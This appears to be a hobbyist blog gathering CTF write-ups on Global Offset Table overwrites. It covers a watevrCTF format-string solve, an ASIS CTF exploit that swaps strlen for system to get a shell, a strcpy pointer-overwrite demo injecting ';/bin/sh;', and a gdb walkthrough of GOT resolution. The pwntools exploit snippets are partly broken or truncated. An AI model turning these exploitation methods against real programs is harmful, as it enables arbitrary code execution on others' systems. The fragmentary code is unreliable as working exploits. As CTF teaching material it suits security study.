Voting Machine 2 (watevrCTF 2019)

Bianry had a format string vulnerability as first argument of printf was controlled by user.

Idea to solve the challenge:

[*] Overwrite the GOT of puts with ‘0x08420736’ (method that prints flag). if you are not sure what is GOT and how it works i recommend you to read this writeup. The reason for choosing GOT of puts is becuase it is been invoked more than once before printf.

Here is the exploit for the challenge.

from pwn import *

get_got = 0x8422020

writes = {0x08422020:0x08420736}

payload = 'AA'
payload += fmtstr_payload(8, writes, numbwritten=2)

p = remote("", 50000)
p.recvuntil("Topic: ")

The flag is – watevr{GOT_som3_fl4g_for_you_}  

ASISCTF-Finals2016(Diapers Simulator)-pwn

This challenge worked for me locally and i got remote shell also but i couldn’t intract with the server for which i don’t the reason, if any one of you finds it please comment to this blog.

Coming to challenge it was a indirect format string vulnerability where you are supposed to get control over the string that is not under our control. 1

Here the brand name is ended with a null byte hence we cannot overflow to the buffer that is passed as argument to printf. But here calling “Change Diapers” decrement integer by -1, hence calling 257 times will make it 0xffffffff. Hence  by doing this we can remove the NULL pointer and overflow into buffer and control the first argument to printf. So using format string vulnerability we can GOT of strlen with system and calling “change brand”  with strlen and spwan a shell. Here is the exploit for the challenge

from pwn import *
strlen = 0x804b028
p.recvuntil("> ")
p.recvuntil("> ")
for x in range(0,257):
       p.recvuntil("> ")
p.recvuntil(": ")
p.recvuntil("> ")
p.recvuntil(": ")
if upper <= lower:         
+"x%18$hn"+"%"+str(abs(lower-upper))+ "x%19$hn" },length=108) 
else : 
+"x%18$hn"+"%"+str(abs(upper-lower))+"x%19$hn" },length=108) 
print p.recvuntil("> ")
print p.recvuntil("> ")

Cracking GOT using pointers

As in my previous blog i have specified how GOT is vulnerable, this is one of the case where you can exploit which is using pointers.

I have used the small program which directly explains the concept.

#include <stdio.h>
#include <stdlib.h>
int main(int argc, char **argv)
  char *pointer = NULL;
  char buffer[10];
  pointer = buffer;
  strcpy(pointer, argv[1]);
  printf("Array contains %s at %p\n", pointer, &pointer);
  strcpy(pointer, argv[2]);
  printf("Array contains %s at %p\nUse this as argument %s \n", pointer, &pointer,argv[3]);
  return EXIT_SUCCESS;


By just looking at the program you should understand the vulnerability, which the program is using “strcpy” to copy. So here is the idea of the to exploit the program.

[*] Using first strcpy overflow the array “buffer” and change the pointer to the GOT of printf.

pointer <– [GOT]

[*] Using the second “strcpy” overwrite the GOT with “system” function, which will spawn you shell at the time of calling second printf function.

[GOT]<– “address of system” (because same pointer is used in the strcpy)

[*] Also supply third argument as “;/bin/sh;” that will do “system(“Array contains %s at %p\nUse this as argument %s \n”, pointer, &pointer,argv[3]);”

I got this idea by looking at this resource. My blog may not be that great as that article but still i tried giving brief description about it.

HACK Using Global Offset Table

This method is useful when ASLR(Address Space Layout Randomization) is enable or one is unable to overwrite a Instruction Pointer.

Global Offset Table is something like a cache. It actually stores the address of the shared library after the first hit i.e after the first call of their respective shared library. The below diagrams and program will give an detail idea.


int main(){

printf("This is my first call\n");
printf("This is my secound call\n");

return 0;

For the particular program we will absorb the change in the GOT before and after the HIT.

Before the First hit:



(gdb) disassemble main
Dump of assembler code for function main:
0x0804841d <+0>:    push   ebp
0x0804841e <+1>:    mov    ebp,esp
0x08048420 <+3>:    and    esp,0xfffffff0
0x08048423 <+6>:    sub    esp,0x10
0x08048426 <+9>:    mov    DWORD PTR [esp],0x80484d0
0x0804842d <+16>:    call   0x80482f0 <printf@plt>
0x08048432 <+21>:    mov    DWORD PTR [esp],0x80484e6
0x08048439 <+28>:    call   0x80482f0 <printf@plt>
0x0804843e <+33>:    leave
0x0804843f <+34>:    ret
End of assembler dump.
(gdb) disassemble 0x80482f0
Dump of assembler code for function printf@plt:
0x080482f0 <+0>:    jmp    DWORD PTR ds:0x804a00c
-->0x080482f6 <+6>:    push   0x0
0x080482fb <+11>:    jmp    0x80482e0
End of assembler dump.

When you dissemble the plt of the above printf function and dereference the it before the first HIT,

(gdb) x/wx 0x804a00c
0x804a00c <printf@got.plt>:    0x080482f6


So when you absorb the result of the above dereferenced value, it is the address in the second line of the disassembled plt(represented in arrow). As it is the first call it is trying to initialize the value into the GOT by searching the complete libc. To make the system faster it saves the address of the libc in GOT.

After the First HIT:




(gdb) x/wx 0x804a00c
0x804a00c <printf@got.plt>:	0xf7e54280

The address likely seemed to be the printf’s libc.

So the main concept which is to be remembered is, after the first call of the any of libc function, the dereferenced value of their respective GOT is the address of the their respective libc function.

So taking advantage of this functionality What if you change the dereferenced value??

So we will try to hack a program in my next blog 😛